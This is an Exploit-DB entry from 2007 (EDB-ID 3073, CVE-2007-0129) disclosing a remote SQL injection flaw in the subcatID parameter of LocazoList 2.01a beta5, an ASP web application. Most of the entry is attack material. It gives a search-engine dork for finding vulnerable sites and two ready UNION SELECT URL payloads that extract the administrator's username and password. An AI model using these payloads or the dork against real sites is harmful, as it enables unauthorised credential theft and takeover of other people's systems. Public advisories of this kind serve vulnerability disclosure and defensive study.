LocazoList <= 2.01a beta5 subcatID Remote SQL Injection Vulnerability

2007-01-03T00:00:00
ID EDB-ID:3073
Type exploitdb
Reporter ajann
Modified 2007-01-03T00:00:00

Description

LocazoList <= 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability. CVE-2007-0129. Webapps exploit for asp platform

                                        
                                            *************************************************************************************
# Title   :  LocazoList &lt;= v2.01a beta5 (subcatID) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.locazo.net:81
# Dork    :  "Powered by Locazolist Copyright Š 2006"
# $$      :  $100

*************************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//main.asp?catid=1&subcatID=[SQL]

Example:

//main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201
//main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-03]